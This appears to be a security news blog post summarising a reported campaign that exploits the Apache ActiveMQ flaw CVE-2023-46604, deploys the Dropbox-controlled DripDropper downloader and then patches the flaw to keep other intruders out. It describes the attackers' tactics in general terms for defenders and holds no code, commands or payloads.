It’s not often you see a cyberattack that ends with the attacker installing security updates. But that’s exactly what’s happening in the latest wave of Apache ActiveMQ exploits, and it’s as clever as it is concerning.
Researchers at Red Canary have discovered a malicious campaign where threat actors exploit a critical vulnerability in Apache ActiveMQ to gain control of cloud-based Linux systems. But once inside, instead of leaving the door wide open… they lock it.
By patching the same bug they used to break in, attackers are not just claiming territory, they’re protecting it from other criminals and hiding their tracks from defenders.
CVE-2023-46604 – The Entry Point
At the center of it all is CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ, scored a maximum CVSS 10.0. It allows attackers to execute arbitrary shell commands simply by sending specially crafted packets to the broker service.
This flaw was patched by Apache in October 2023, but as always, unpatched systems still remain vulnerable, and threat actors are taking full advantage.
Initially seen delivering ransomware and botnets like HelloKitty, GoTitan, and Godzilla web shells, the exploit has now been adopted for stealthier, more persistent attacks.
DripDropper
In these new attacks, the exploit chain drops a custom downloader dubbed DripDropper, a password-protected Linux binary built using PyInstaller. This is not your typical malware: DripDropper communicates with a Dropbox account, not a sketchy C2 server, to receive instructions and download payloads.
Once active, it performs a variety of tasks:
- Enables root login by modifying sshd_config.
- Installs persistence mechanisms using cron jobs (/etc/cron.daily, etc.).
- Fetches additional files capable of monitoring processes or making system changes.
- Uses Dropbox for C2 traffic, blending perfectly into normal network behavior.
The Final Stage: Patching the Vulnerability
Here’s the twist.
After establishing a foothold, attackers download and apply the official patch for CVE-2023-46604, straight from Apache Maven’s repository. Why? Because:
- It stops others from exploiting the same vulnerability and taking over.
- It hides the method of entry, confusing defenders and threat hunters.
- It ensures longevity, since the attackers already have alternative backdoors in place.
It’s like robbing a house, installing a new security system, and keeping the only key.
Not the First Time
While rare, this tactic isn’t unheard of. In July, France’s national cybersecurity agency (ANSSI) reported similar behavior by a China-linked initial access broker, who exploited vulnerabilities only to patch them later and stay quietly embedded.
It’s a stark reminder: attackers are evolving from smash-and-grab operations into long-term occupiers.
Conclusion
Security isn’t just about building walls, it’s about knowing who’s inside them. The DripDropper campaign is a perfect example of attackers thinking several steps ahead: exploiting vulnerabilities, securing access, blending into normal traffic, and covering their tracks.
In a world where malware downloads patches and uses Dropbox as a C2 hub, defenders need to be more vigilant than ever. Because if the bad guys are updating your systems before you are, the real problem isn’t the exploit, it’s the delay.
